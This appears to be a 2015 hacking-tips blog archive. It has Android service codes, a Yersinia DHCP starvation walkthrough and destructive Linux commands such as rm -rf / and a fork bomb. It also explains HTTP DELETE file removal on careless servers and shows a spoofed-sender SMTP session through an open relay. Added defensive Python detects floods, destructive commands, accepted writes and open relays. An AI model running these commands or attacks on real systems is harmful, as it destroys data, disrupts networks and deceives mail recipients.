
Monday, December 7, 2015

Alternative to Google Chrome

Alternative to Google Chrome : SRWare

If you have privacy concerns and your beloved Google Chrome bothers you about privacy, well, this is for you.

SRWare Iron: The Browser of the future


SRWare Iron: The browser of the future - based on the free source code of "Chromium" - without the privacy and security problems

Google's web browser Chrome impressed with extremely fast page rendering, a sleek design and innovative features. But it is also criticised by data protection specialists, for reasons such as creating a unique user ID or submitting what you type to Google to generate suggestions. SRWare Iron is a real alternative. The browser is based on the Chromium source and offers the same features as Chrome, but without the points that raise privacy concerns.

We were therefore able to create a browser with which you can use the innovative features without worrying about your privacy.

We want our users to participate in our work and make the browser freely downloadable under the name "SRWare Iron".

What does Iron do differently? Read here.



* Chrome and Google are registered trademarks of Google Inc. 

Saturday, October 31, 2015

Secret Codes For Android



1. Complete Info About your Phone

*#*#4636#*#*

This code can be used to get some interesting information about your phone and battery. It shows the following 4 menus on screen:
Phone information
Battery information
Battery history
Usage statistics

2. Factory data reset

*#*#7780#*#*

This code can be used for a factory data reset. It'll remove the following things:
Google account settings stored in your phone
System and application data and settings
Downloaded apps
It'll NOT remove:
Current system software and bundled applications
SD card files, e.g. photos, music files, etc.
Note: Once you enter this code, you get a prompt screen asking you to click on the "Reset phone" button, so you get a chance to cancel the operation.

3. Format your Android

*2767*3855#

Think before you enter this code. This code is used for a factory format. It'll remove all files and settings, including the internal memory storage. It'll also reinstall the phone firmware.

Note: Once you enter this code, there is no way to cancel the operation unless you remove the battery from the phone. So think twice before entering this code.

4. Phone Camera Update

*#*#34971539#*#*

This code is used to get information about the phone camera. It shows the following 4 menus:
1. Update camera firmware in image (Don't try this option)
2. Update camera firmware in SDcard
3. Get camera firmware version
4. Get firmware update count

WARNING: Never use the first option, otherwise your phone camera will stop working and you'll need to take your phone to a service center to reinstall the camera firmware.

5. End Call/Power

*#*#7594#*#*

This one is my favorite. This code can be used to change the "End Call / Power" button action on your phone. By default, if you long-press the button, it shows a screen asking you to select an option from Silent mode, Airplane mode and Power off. You can change this action using this code: you can enable direct power off on this button so you don't need to waste time selecting the option.

6. File Copy for Creating Backup

*#*#273283*255*663282*#*#*

This code opens a File copy screen where you can backup your media files e.g. Images, Sound, Video and Voice memo.

7. Service Mode

*#*#197328640#*#*

This code can be used to enter Service mode. You can run various tests and change settings in Service mode.

8. WLAN, GPS and Bluetooth Test Codes:
*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#* - WLAN test (use the "Menu" button to start various tests)

*#*#232338#*#* - Shows WiFi MAC address

*#*#1472365#*#* - GPS test

*#*#1575#*#* - Another GPS test

*#*#232331#*#* - Bluetooth test

*#*#232337#*# - Shows Bluetooth device address

9. Codes to get Firmware version information:

*#*#4986*2650468#*#* - PDA, Phone, H/W, RFCallDate

*#*#1234#*#* - PDA and Phone

*#*#1111#*#* - FTA SW Version

*#*#2222#*#* - FTA HW Version

*#*#44336#*#* - PDA, Phone, CSC, Build Time, Changelist number

10. Codes to launch various Factory Tests:

*#*#0283#*#* - Packet Loopback

*#*#0*#*#* - LCD test

*#*#0673#*#* OR *#*#0289#*#* - Melody test

*#*#0842#*#* - Device test (Vibration test and BackLight test)

*#*#2663#*#* - Touch screen version

*#*#2664#*#* - Touch screen test

*#*#0588#*#* - Proximity sensor test

*#*#3264#*#* - RAM version

*USE AT YOUR OWN RISK*

Hack a DHCP Server

How To Hack a DHCP Server

What is DHCP?

Dynamic Host Configuration Protocol (DHCP) is a network protocol that enables a server to automatically assign an IP address to a computer from a defined range of addresses (a scope) configured for a given network.

DHCP works on the DORA concept:

1. Discover: the client makes a UDP broadcast to the server with a DHCPDISCOVER (Discover) packet.
2. Offer: the server sends a DHCPOFFER to the client, including the other configuration parameters (DHCP options) for the client according to the server's configuration file.
3. Request: in response to the offer, the client replies with a DHCPREQUEST, unicast to the server, requesting the offered address.
4. Acknowledge: the server sends a DHCPACK acknowledging the request, which is the client's final permission to take the address as offered. Before sending the ACK the server double-checks that the offered address is still available and that the parameters match the client's request and, if so, marks the address as taken.

Attack on DHCP Server :-

Open the Kali Linux terminal and type the command root@kali:~# yersinia -G to open the GUI interface of Yersinia.
Now click on the Launch Attack option and select the DHCP tab.
Now select the "sending DISCOVER packet" option for your attack and click OK.
It will now start the attack on the DHCP server, sending tons of packets to your DHCP server within seconds.
With Yersinia you are able to attack the CDP, DHCP, 802.1Q, 802.1X, DTP, HSRP, ISL, STP and VTP protocols.

Countermeasures or Mitigation :-

You need to enable DHCP snooping on the Cisco switches:
DHCP snooping allows ports to be configured as trusted or untrusted.
Untrusted ports cannot process DHCP replies.
Configure DHCP snooping trust on the uplinks to a DHCP server.
Do not configure DHCP snooping trust on client ports.

Configuring DHCP Snooping

Note :- This tutorial is for educational purposes only.

-H4ckz
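As an added example (not part of the original post), the Python below decodes the message type of each DHCP packet so the four DORA steps can be seen on the wire, and then flags the burst of DISCOVERs from many different client MACs that a DISCOVER flood of the kind described above produces, which is what a network monitor would alert on. The packet builder, the thresholds and the sample traffic are constructed for this example.

```python
import struct

# DHCP message types carried in option 53 (RFC 2132); these are the D, O, R, A of the post.
MESSAGE_TYPES = {1: "DISCOVER", 2: "OFFER", 3: "REQUEST", 4: "DECLINE",
                 5: "ACK", 6: "NAK", 7: "RELEASE", 8: "INFORM"}
MAGIC_COOKIE = b"\x63\x82\x53\x63"   # marks the start of the options field


def parse_dhcp(payload: bytes) -> dict:
    """Decode the fixed BOOTP header and the option-53 message type of one DHCP payload."""
    if len(payload) < 240 or payload[236:240] != MAGIC_COOKIE:
        raise ValueError("not a DHCP packet")
    op, htype, hlen, hops = struct.unpack("!BBBB", payload[:4])
    xid = struct.unpack("!I", payload[4:8])[0]
    chaddr = payload[28:28 + hlen]           # client hardware (MAC) address
    msg_type = None
    i = 240
    while i < len(payload):
        code = payload[i]
        if code == 255:                      # END option
            break
        if code == 0:                        # PAD option has no length byte
            i += 1
            continue
        length = payload[i + 1]
        value = payload[i + 2:i + 2 + length]
        if code == 53 and length == 1:
            msg_type = MESSAGE_TYPES.get(value[0], "UNKNOWN")
        i += 2 + length
    return {"op": op, "xid": xid, "mac": chaddr.hex(":"), "type": msg_type}


def build_dhcp(msg_type_code: int, mac: bytes, xid: int, op: int = 1) -> bytes:
    """Build a minimal DHCP packet; used here only to fabricate sample traffic."""
    # op, htype=1 (Ethernet), hlen=6, hops, xid, secs, flags (broadcast bit set)
    header = struct.pack("!BBBBIHH", op, 1, 6, 0, xid, 0, 0x8000)
    header += b"\x00" * 16                          # ciaddr, yiaddr, siaddr, giaddr
    header += mac + b"\x00" * (16 - len(mac))       # chaddr, padded to 16 bytes
    header += b"\x00" * 192                         # sname (64) + file (128)
    options = MAGIC_COOKIE + bytes([53, 1, msg_type_code, 255])
    return header + options


def detect_discover_flood(packets, window_seconds=1.0, max_discovers=20, max_clients=10):
    """Flag a sliding window holding more than max_discovers DISCOVERs from more than
    max_clients distinct MACs: the signature of a starvation flood, not of a normal DORA.
    packets: iterable of (timestamp, payload). Returns [(window_start, count, distinct_macs)].
    The thresholds are assumptions for this example; tune them to the size of your segment."""
    alerts, window = [], []
    for ts, raw in packets:
        pkt = parse_dhcp(raw)
        if pkt["type"] != "DISCOVER":
            continue
        window.append((ts, pkt["mac"]))
        window = [w for w in window if ts - w[0] <= window_seconds]
        distinct = len({mac for _, mac in window})
        if len(window) > max_discovers and distinct > max_clients:
            alerts.append((window[0][0], len(window), distinct))
            window = []                             # one alert per burst
    return alerts


def sample_traffic():
    """Constructed sample: one legitimate DORA exchange, then 30 DISCOVERs from 30
    different MACs inside 0.3 s, the pattern a DISCOVER flood produces."""
    client = bytes.fromhex("001122334455")
    pkts = [
        (0.00, build_dhcp(1, client, 0x1001)),          # DISCOVER  (client -> broadcast)
        (0.01, build_dhcp(2, client, 0x1001, op=2)),    # OFFER     (server -> client)
        (0.02, build_dhcp(3, client, 0x1001)),          # REQUEST   (client -> server)
        (0.03, build_dhcp(5, client, 0x1001, op=2)),    # ACK       (server -> client)
    ]
    for n in range(30):
        fake_mac = bytes.fromhex("0200000000") + bytes([n])
        pkts.append((10.0 + n * 0.01, build_dhcp(1, fake_mac, 0x2000 + n)))
    return pkts


if __name__ == "__main__":
    for ts, raw in sample_traffic()[:4]:
        print(ts, parse_dhcp(raw)["type"])
    print(detect_discover_flood(sample_traffic()))   # [(10.0, 21, 21)]
```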

Compress Large Files

How To Compress Large Files Using Winrar


WinRAR is a powerful archive manager. It can back up your data and reduce the size of email attachments, decompress RAR, ZIP and other files downloaded from the Internet, and create new archives in RAR and ZIP format.
You can download the trial version of the software at rarlab.com

To compress large file using Winrar follow simple steps given below:

Step 1: Select and Right click on the file you want to Compress and select Add to Archive option.

Step 2: A window will pop up with various options. In Archive name field type the name of your archive manually in the text box provided below.
Step 3: When creating a new archive, you first need to select the archive format.
ZIP is preferable when you are not sure that a receiver of your archive has WinRAR.
Otherwise just select RAR, since it provides more options and higher compression.
Step 4: There are six compression methods supported: "Store", "Fastest", "Fast", " Normal", "Good" and "Best".
The Best method provides high, but slow compression.
Fastest method compresses poorly, but it is very fast. Store method just merges files into an archive without any compression.
If you want to create an archive for distribution or for long storage,
It would be best to probably ignore the time constraint and choose the Best compression method to reduce the size as much as possible.
But for daily backups choose Normal compression method.
Step 5: At the bottom there is a box labelled "Split to volumes, bytes". Enter a figure in the box or use the drop-down menu to make your choice.
Remember you have to enter the value in bytes, kilobytes or megabytes and this applies only to .rar extension. (1024 KB equals 1 MB)
In the example below, I have chosen 98078 KB which comes to around 95.77 MB.
Step 6: When you have chosen the right options for your archive, click the OK button.
-HAckz

Deadly Commands In Linux


1. rm -rf /  = Will delete everything.

Explanation:
 rm : removes the files.
-rf : makes rm run recursively and forcibly, so it deletes all files and folders without prompting you.
/ : tells rm to start from the root directory, i.e. all files on your computer including removable drives.


________________________________________
2. :(){ :|: & };: = This Line Looks Simple but its Dangerous , Bash Function.
It Defines Shell Function that will Create New Copies Of Itself . This Process will Continue and Freeze Your Computer. It Can also be Called as Danial-of-Server Attack.


________________________________________
3. mkfs.ext4 /dev/sda1 = This command will format your hard drive.

Explanation:
mkfs.ext4 : this part of the command creates a new ext4 file system on the following device.
/dev/sda1 : this part specifies the 1st partition on the 1st hard drive, which is probably in use.

Similarly, the command mkfs.ext3 /dev/sdb2 will format the 2nd partition on the 2nd hard drive with an ext3 file system.


________________________________________
4. command > /dev/sda = This command will write directly to a hard drive.
It runs the command and sends its output directly to the hard drive, overwriting the data on the drive and damaging your system.

Explanation:
command : runs any command.
> : sends the output of the command to the following location.
/dev/sda : the raw device of the first hard disk, so the output is written straight onto the disk.


________________________________________
5. mv ~ /dev/null = This command will move your home directory to a black hole.
Consider /dev/null a black hole here: anything moved to /dev/null is gone forever. Hence mv ~ /dev/null will send all your personal files into the black hole.

Explanation:
mv : moves the following files to another location.
~ : represents your entire home folder.
/dev/null : the destination; moving your home folder here destroys all your files and deletes the original copy.
- See more at: http://www.geekofreak.com/2013/07/deadliest-commands-for-linux-that-you.html
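From the defensive side, here is an added Python example (not from the original post or its source) that lints a shell script for the five commands listed above before it is allowed to run, which is the kind of check a CI pipeline or a deployment gate would apply. The regular expressions are approximations rather than a shell parser, and the sample script is constructed; the fork-bomb rule generalises the post's form to any self-piping function name.

```python
import re

# Block devices the post's mkfs and redirection examples target (sdX, hdX, plus vdX and nvme).
DEVICE = r"/dev/(?:sd[a-z]|hd[a-z]|vd[a-z]|nvme\d+n\d+p?)\d*"
END = r"(?=\s|$|[;&|])"   # the path must end here, so /dev/sdcard.txt is not flagged

# One rule per command in the post. The fork-bomb rule uses a backreference, so a renamed
# copy such as bomb(){ bomb|bomb & };bomb is caught as well as the :(){ :|: & };: form.
RULES = [
    ("rm-root",    re.compile(r"\brm\s+(?:-\S+\s+)*/\*?" + END),
     "recursive delete starting at / (rm -rf /)"),
    ("fork-bomb",  re.compile(r"([\w:]+)\(\)\s*\{\s*\1\s*\|\s*\1\s*&\s*\}\s*;\s*\1"),
     "shell function that pipes into copies of itself (fork bomb)"),
    ("mkfs-disk",  re.compile(r"\bmkfs(?:\.\w+)?\s[^;&|]*" + DEVICE + END),
     "filesystem created over a disk or partition (mkfs.ext4 /dev/sda1)"),
    ("write-disk", re.compile(r">\s*" + DEVICE + END),
     "command output redirected onto a block device (command > /dev/sda)"),
    ("mv-devnull", re.compile(r"\bmv\s[^>;&|]*\s/dev/null" + END),
     "files moved onto /dev/null (mv ~ /dev/null); plain 2>/dev/null redirects are not matched"),
]


def scan_script(text):
    """Return (line_number, rule_name, explanation) for every line matching a rule.
    Comments are stripped with a plain '#' split, which ignores quoting; adequate for a lint pass."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        code = line.split("#", 1)[0]
        for name, rx, why in RULES:
            if rx.search(code):
                findings.append((lineno, name, why))
    return findings


# Constructed sample script: harmless look-alikes next to the destructive lines.
SAMPLE_SCRIPT = """#!/bin/sh
# constructed sample, do not run
rm -rf /tmp/build
rm -rf /
:(){ :|: & };:
bomb(){ bomb|bomb & };bomb
mkfs.ext4 /dev/sda1
mkfs.ext4 /dev/loop0
cat payload.bin > /dev/sda
echo done > /dev/null
mv ~ /dev/null
mv a.txt b.txt 2>/dev/null
"""

if __name__ == "__main__":
    for lineno, name, why in scan_script(SAMPLE_SCRIPT):
        print(f"line {lineno}: {name}: {why}")
```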

How To Delete Files Of A Website


There is a way to delete files of a website with the help of HTTP [hypertext transfer protocol], but this security hole is mostly closed. The hole is caused by careless administrators who cannot configure their Apache, IIS or other HTTP server properly.

4-1-1 - HTTP

HTTP has existed since 1990. Before that, the internet was used to exchange files with FTP or to log into mailboxes where you could write messages, among many other things. With HTTP and HTML [hypertext markup language], WWW clients like Netscape or IE can interpret this hypertext to display information and other things, as you know. What the user does not see when using such a client is that HTTP also follows a request/response pattern: the client requests information with a special command (I will explain these commands, among others, later) and the HTTP server answers with the requested information. These requests and answers are HTTP messages, which can be a simple request, a simple response, a full request or a full response. The simple HTTP messages are based on HTTP/0.9 and the full messages on HTTP/1.0; the difference between these messages is very small, except for the one between HTML/0.9 and HTML/1.0.

1 - GET [address]: the address is the complete one, like http://www.target.com/index.html. This command requests the information [the code] in this file; if the file is a CGI it has to be executed and the produced output is sent to the client. The difference between this simple request and the full request is that the full request ends with HTTP/1.0, like this: [GET http://www.target.com/index.html HTTP/1.0]

2 - HEAD [address]: it has to be a complete address too. The small difference between this command and the GET command is that this command returns only the meta tags and the other information in the title tag.

3 - POST [address]: this is used for bigger data; it is mostly used for data which has to be sent to a program.

4 - PUT [address]: with PUT you send data to the server, like HTML documents, and this data is saved under the address.

5 - DELETE [address]: this is the opposite of PUT, so it deletes the data which you have specified with the address.

4-1 - How To Delete Files Of A Website
With your instinct you have discovered that there is a security hole. Today HTTP is used in combination with FTP: FTP is used by webmasters to upload their files and HTTP is used by the client to retrieve the site. But in former times, during the development of HTTP, the developers aimed to make it easier to upload files, that is, without FTP and so without a special FTP client, so they created commands to upload and delete files on a web server. The problem is that HTTP did not use authentication but FTP does, so most administrators disabled these commands to close the security hole. But there are not only experienced admins out there but careless ones too, so such holes still exist and wait to be used. Telnet is an excellent simple tool: if you want to use this security hole, connect to the destination hostname or IP [you can use a hostname because DNS will be used to resolve the IP] on port 80 (I have shown you how to do it); when the connection is established you can use the commands described above.

*USE AT YOUR OWN RISK*
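As an added example (not from the original post), the Python below shows how an administrator checks the server side of what is described above: it parses access-log lines in the common Apache/nginx combined format, including HTTP/0.9 simple requests that carry no version, and reports every PUT or DELETE the server answered with a 2xx status, meaning the write was actually performed rather than refused. The log lines are constructed and use RFC 5737 documentation addresses.

```python
import re
from collections import Counter

# The two methods the post warns about: a server that honours them without authentication
# lets any client create or remove files.
WRITE_METHODS = {"PUT", "DELETE"}

# Apache/nginx "combined" log format. The protocol token is optional so that HTTP/0.9
# simple requests (no version, as the post describes) still parse.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = """\
203.0.113.9 - - [07/Dec/2015:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 1024
203.0.113.9 - - [07/Dec/2015:10:00:02 +0000] "DELETE /index.html HTTP/1.0" 405 233
198.51.100.7 - - [07/Dec/2015:10:00:03 +0000] "PUT /upload.html HTTP/1.0" 201 0
198.51.100.7 - - [07/Dec/2015:10:00:04 +0000] "DELETE /index.html HTTP/1.0" 204 0
198.51.100.7 - - [07/Dec/2015:10:00:05 +0000] "GET /index.html" 404 12
"""


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_accepted_writes(lines):
    """Return (ip, method, path, status) for PUT/DELETE requests answered with 2xx, i.e. the
    server performed the write instead of refusing it (405, 401 or 403 are the healthy replies)."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] in WRITE_METHODS and 200 <= rec["status"] < 300:
            hits.append((rec["ip"], rec["method"], rec["path"], rec["status"]))
    return hits


def write_method_summary(lines):
    """Count (method, status) pairs for write methods, to see at a glance whether the server
    rejects them (405) or honours them (2xx)."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] in WRITE_METHODS:
            counts[(rec["method"], rec["status"])] += 1
    return counts


if __name__ == "__main__":
    for hit in find_accepted_writes(SAMPLE_LOG.splitlines()):
        print("accepted write:", hit)
    print(write_method_summary(SAMPLE_LOG.splitlines()))
```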

Telnet

What is Telnet ? 


Most of you only know that Telnet is a port [port 23] or that Telnet is a remote control tool. Remote control means in this context that you, as the client, can open a connection to, for example, a Telnet server and then type commands in a derivative of a shell; these commands are executed only on that server, not on your machine. But I want to show all of you how to use this simple remote control tool in several ways, because this simplicity is brilliant. So I hope I answered this question; if you are interested, go on and read, if not, stop reading and go pissing.

2 - How To Use Telnet ?

Telnet is a text-based tool, so if you want to connect to the destination [128.62.254.12] write: 'telnet 128.62.254.12 23'. So you see, first there is the command telnet to start the Telnet client, next is the destination address and last is the port; you know the Telnet port, 23. So I hope you can use Telnet now.

3 - How To Send Anonymous Mails ?
3-1 - SMTP

Yes, first I have to say something about SMTP [simple mail transfer protocol]. The standard is written down in RFC 821 [RFC = request for comments] and goes back to the year 1982. This RFC defines the commands which can be used. These commands are:

1 - HELO [client address or name], marks the beginning of the SMTP session and sends your name or address to the SMTP server

2 - MAIL FROM [your mail address], with this command you send your mail address to the server; it is also written into the e-mail as the sender

3 - RCPT TO [recipient], with this command you define the recipient

4 - DATA, marks the beginning of the e-mail; if the server sends an ack [acknowledge] you can begin to write the message

5 - RSET, reset; this re-establishes the initial state and the current transaction is cancelled

6 - NOOP, no operation, so it means that nothing is done

7 - QUIT, this ends the SMTP connection

But these are only the most important commands; many commands have been added since the RFC defined them, for example:

EXPN, expand; with this command mailing list support is available
VRFY, verify; this command requests confirmation of a recipient address

Because of these additions SMTP is also called ESMTP, which means Extended SMTP.

3-2 How To Use SMTP To Send Anonymous Mails
First you have to find a freely accessible SMTP server. Because of spamming, many providers have secured their systems: GMX, for example, uses [SMTP after POP], which means that first you have to log in to POP with the username and password of your GMX e-mail address, after which the server saves your IP for a certain time during which you can connect to the SMTP server to send mails. Freenet uses another protection: its SMTP server denies certain recipient addresses. So you have to search for a freely accessible mail server without such protections; they exist. After you have found such a server you can write in your shell: [telnet <serveraddy> 25] and your client connects to it. Here is a complete Telnet session:

Connected to mail.gmx.net.
220 {mp015-rz3} GMX Mailservices ESMTP
HELO www.The-Netrix.net
250 {mp015-rz3} GMX Mailservices
MAIL FROM:LinusTorvalds@linux.org
250 ... Sender Okay
RCPT TO:Bgate@microsoft.com
250 ... Recipient Okay
DATA
354 Enter mail, end with "." on a line by itself
Operating Systems are like sex, you have the best if it is free
.
250 Mail accepted
QUIT
221 mail.gmx.net closing connection
Connection closed by foreign host.

First your client tries to connect to the mail server; as a sign that the connection is established the server answers with a line like the one shown. Then you say hello to the server with the command [HELO] and your machine's name. Next comes another answer from the server, which is unimportant. After that you send your mail address to the server with the command [MAIL FROM:] followed by your address; the server checks this address and, if it is OK, informs you about it. Next it expects the recipient, and you don't keep it waiting: the command [RCPT TO:] followed by the recipient's address. If this is also OK you can start to write your mail after the command [DATA], which is followed by the server's ack and the text or character that marks the end of the mail. Then you write your mail and end it the way the server expects. If the mail is OK the server informs you for the last time in this session; after that there is no reason to hold the connection, so you end it with [QUIT] and the server sends a last message as a sign that the connection is closed.
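Seen from the mail administrator's side, the session above is exactly what relay and spoofing controls look for. As an added example (not from the original post), the Python below parses the transcript shown above, reconstructs the envelope and the reply code each command received, and flags the two indicators in it: the HELO identity does not match the claimed sender domain, and the server accepted mail from a foreign sender to a foreign recipient, which is the definition of an open relay. The domain heuristic is a constructed simplification (last two labels, no public-suffix list).

```python
import re

# The transcript from the post above, used unchanged as the sample input.
SESSION = """Connected to mail.gmx.net.
220 {mp015-rz3} GMX Mailservices ESMTP
HELO www.The-Netrix.net
250 {mp015-rz3} GMX Mailservices
MAIL FROM:LinusTorvalds@linux.org
250 ... Sender Okay
RCPT TO:Bgate@microsoft.com
250 ... Recipient Okay
DATA
354 Enter mail, end with "." on a line by itself
Operating Systems are like sex, you have the best if it is free
.
250 Mail accepted
QUIT
221 mail.gmx.net closing connection
Connection closed by foreign host."""

REPLY_RE = re.compile(r"^(\d{3})[ -](.*)$")     # server replies start with a 3-digit code
COMMAND_RE = re.compile(
    r"^(HELO|EHLO|MAIL FROM|RCPT TO|DATA|RSET|NOOP|QUIT|VRFY|EXPN)\b:?\s*(.*)$", re.I)


def parse_session(text):
    """Walk the transcript and return the envelope (HELO, MAIL FROM, RCPT TO), whether the
    message was accepted, and the reply code each command received."""
    state = {"helo": None, "mail_from": None, "rcpt_to": [], "accepted": False, "replies": []}
    in_data, pending = False, None
    for line in text.splitlines():
        if in_data:                        # message body: everything up to the lone "."
            if line == ".":
                in_data, pending = False, "DATA-END"
            continue
        reply = REPLY_RE.match(line)
        if reply:
            code = int(reply.group(1))
            state["replies"].append((pending or "GREETING", code))
            if pending == "DATA" and code == 354:
                in_data = True             # server is ready for the body
            if pending == "DATA-END" and code == 250:
                state["accepted"] = True   # server took responsibility for delivery
            pending = None
            continue
        cmd = COMMAND_RE.match(line)
        if cmd:
            verb, arg = cmd.group(1).upper(), cmd.group(2).strip()
            pending = verb
            if verb in ("HELO", "EHLO"):
                state["helo"] = arg
            elif verb == "MAIL FROM":
                state["mail_from"] = arg.strip("<>")
            elif verb == "RCPT TO":
                state["rcpt_to"].append(arg.strip("<>"))
    return state


def _domain(addr_or_host):
    """Crude registrable-domain guess (last two labels); no public-suffix list, fine for the sample."""
    host = addr_or_host.rsplit("@", 1)[-1].lower().rstrip(".")
    return ".".join(host.split(".")[-2:])


def relay_check(state, server_domain):
    """Indicators an admin would flag: HELO identity vs. claimed sender domain, and mail
    accepted from a foreign sender to a foreign recipient (open relay).
    server_domain is the domain this MTA is responsible for."""
    sender_dom = _domain(state["mail_from"]) if state["mail_from"] else None
    helo_dom = _domain(state["helo"]) if state["helo"] else None

    def local(dom):
        return dom is not None and dom.endswith(server_domain.lower())

    return {
        "helo_mismatch": None not in (sender_dom, helo_dom) and helo_dom != sender_dom,
        "third_party_relay": state["accepted"] and not local(sender_dom)
                             and not any(local(_domain(r)) for r in state["rcpt_to"]),
    }


if __name__ == "__main__":
    s = parse_session(SESSION)
    print([code for _, code in s["replies"]])      # [220, 250, 250, 250, 354, 250, 221]
    print(relay_check(s, "gmx.net"))               # both indicators True
```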


Vulnerabilities Website

Types of Web Vulnerabilities 


[x] PHP code injection
[x] PHP curl_exec() url is controlled by user
[x] PHP invalid data type error message
[x] PHP preg_replace used on user input
[x] PHP unserialize() used on user input
[x] Arbitrary File Deletion
[x] Code Execution Hacking(LFI,RFI,Iframe Injection, Remote Code Execution)
[x] Cookie Manipulation (Meta HTTP-EQUIV & CRLF Injection)
[x] CRLF Injection (HTTP response splitting & Headers Injection)
[x] Cross Frame Scripting ( XFS )
[x] Cross-Site Scripting ( XSS - Persistent, Non-Persistent, DOM Based)
[x] Directory traversal including shell uploading
[x] Microsoft Office possible sensitive information
[x] Possible internal IP address disclosure
[x] Possible server path disclosure (Unix and Windows)
[x] Possible username or password disclosure
[x] Sensitive data not encrypted
[x] Source code disclosure
[x] Cross-Site Request Forgery (CSRF)
[x] Email Injection
[x] File Inclusion (LFI,RFI with and without null byte)
[x] Full Path Disclosure
[x] LDAP Injection
[x] Remote XSL inclusion
[x] Script source code disclosure
[x] Server-Side Includes (SSI) Injection
[x] Structured Query Language Injection(SQL Injection)
[x] URL Redirection
[x] XPath Injection vulnerability
[x] EXIF
[x] Buffer Overflows
[x] Clickjacking
[x] Dangling Pointers
[x] Format String Attack
[x] FTP Bounce Attack
[x] Symlinking and Server Rooting
[x] Blind SQL injection (timing - Boolean Based)
[x] Blind SQL Injection (Blind SQL String Based and Double Query Blind Based)
[x] 8.3 DOS Filename Source Code Disclosure
[x] Search for Backup files
[x] Cross Site Scripting in URI
[x] PHP super-globals-overwrite
[x] Script errors (such as the Microsoft IIS Cookie Variable Information Disclosure)
[x] WebDAV (very vulnerable component of IIS servers)
[x] Application error message
[x] Check for common files
[x] Directory Listing
[x] Email address found
[x] Local path disclosure
[x] Possible sensitive files

OSI Layers

7 Layers of OSI


The ISO (International Organization for Standardization) decided to construct a framework of standards in which different vendors would be able to use in order to communicate over a network consisting of diverse equipment and applications.  This framework is now considered the standard for communication of networks.  The OSI is divided into 7 layers, which divides the task into smaller more manageable task groups.  Each task or group of tasks assigned to each layer can also be implemented independently.  This limits complications between layers because the solutions offered by one layer do not adversely affect the other layers.

The 7 layers can be split logically into two subgroups. Layers 7 through 4 focus on the end-to-end communication between data source and destination. Layers 3 through 1 provide consistent communication between the network devices. An easier way of looking at the OSI model is dividing the upper layers (7, 6, 5) from the lower layers (4, 3, 2, 1). The upper layers deal with application issues and are implemented only in software. The highest layer, the application layer, is the closest to the end user. The lower layers are responsible for the transportation of the data. The physical layer and the data link layer are implemented in hardware and software. The lowest layer, the physical layer, is closest to the physical network medium (the wires, for example) and is responsible for placing data on the medium.

The following is a top-down explanation of the OSI Model. It starts with the user's PC and it follows what happens to the user's file as it passes though the different OSI Model layers. The top-down approach was selected specifically (vs. starting at the Physical Layer and working up to the Application Layer) for ease of understanding. It is used here to show how the user's files are transformed (through the layers) into a bit stream for transmission on the network.


LAYER 7 - APPLICATION

The application layer provides services that directly support the user applications, such as user interface, e-mail, file transfer, database access, etc. There are many commonly needed protocols at this layer, such as HTTP, WWW, FTP, TELNET, SMTP. It gives applications access to the network through the layers below. Another important function is file transfer between computers. Some computers store file names or represent text lines differently. The application layer takes care of the incompatibilities and allows a smooth transfer between systems.
Protocols: FTP, HTTP, SMTP, DNS, TFTP, NFS, TELNET.


LAYER 6 - PRESENTATION

The presentation layer is the translator between the application and network formats. Unlike the lower layers, its concern is with the syntax and semantics of the information transmitted. Most user programs do not exchange random binary bit strings. They exchange data such as names, addresses, dates, etc. Different computers store the data in different ways. In order to allow these computers to transmit the data to each other, the presentation layer translates the data into a standard form to be used on the network. Another function is data compression, which can be used to reduce the number of bits needed to send the packet of information. Security is also added at this layer by using data encryption and decryption. This prevents others from intercepting the data and being able to decipher the meaning of the bits.
Protocols: ASCII, EBCDIC, MIDI, MPEG, JPEG.


LAYER 5 - SESSION

This layer allows applications on connecting systems to communicate using a session. It opens, uses, and closes this communication link. It also acts as a dialog control mechanism, controlling who is able to transmit. Sessions can allow data to be sent in both directions at the same time or in only one direction. The session layer determines who has the ability to transfer at the current time. Another valuable ability is to insert checkpoints during data transfers. During a large file transmission, if the system crashes the checkpoints allow the system to resume downloading at the last known checkpoint. An example of this is during either an interactive login or a file transfer connection: the session layer would recognize names in the session and register them into a history. It could then connect and reconnect in case of a system crash at either of the systems.
Protocols: SQL, RPC.


LAYER 4 - TRANSPORT

The basic function of the transport layer is to accept data from the session layer, break up the data into smaller units if need be, and send these manageable data packets to the network layer. At the destination this layer is responsible for combining the packets into their original state. This layer also checks to see if the packets are in the right order when received and not duplicated. If there is an error in one of the packets there is a request for that packet's retransmission. There are two protocols that sit at this layer. First, the TCP protocol connects the sender and the receiver using a socket, which is determined by the IP address and port number. TCP keeps track of the packet delivery order and which ones need to be resent. UDP, on the other hand, is connectionless and does not guarantee packet delivery between sender and receiver. Because it is connectionless, the sender sends the data into the network with the IP address of the receiver and hopes it makes it to its destination. Since there is no way of asking the sender to retransmit because of an error, there is little error protection, if any.
Protocols: TCP or UDP.



LAYER 3 - NETWORK
The network layer basically handles all of the addressing issues. This layer addresses packets, determines the best path or route, and manages network problems such as data congestion. There are three ways in which the packets are routed to their destinations. First, there could be a static route through the entire network that will never be changed. Second, there could be a static line only used during a particular session between the sender and receiver. Finally, the packets could be dynamically sent through the network using changing paths in order to prevent bottlenecks. The bottlenecks are formed when there are too many packets present in one subnet causing them to get in each other's way. The network level is also responsible for converting the network address and names to the MAC addresses of the machines. One of the most important functions of this layer is the ability to allow two different networks using conflicting addressing schemes to be able to send data to each other. The network layer allows the different protocols to "talk" to each other and understand where the packet's destination is.  Routers work at this level by sending the packets along the network.
Protocols: IP, ICMP, ARP, PING, Traceroute.



LAYER 2 - DATA LINK

The data link layer defines the format of data on the network. All of the data sent through the network are made into a frame which is performed at this level. The frame is a uniform way of sending the data along with address information and error checking capabilities. CRC is used for the error detection at this level. If at the receiving end the CRC fails at this level there is a request back to the sender for retransmission of this packet.
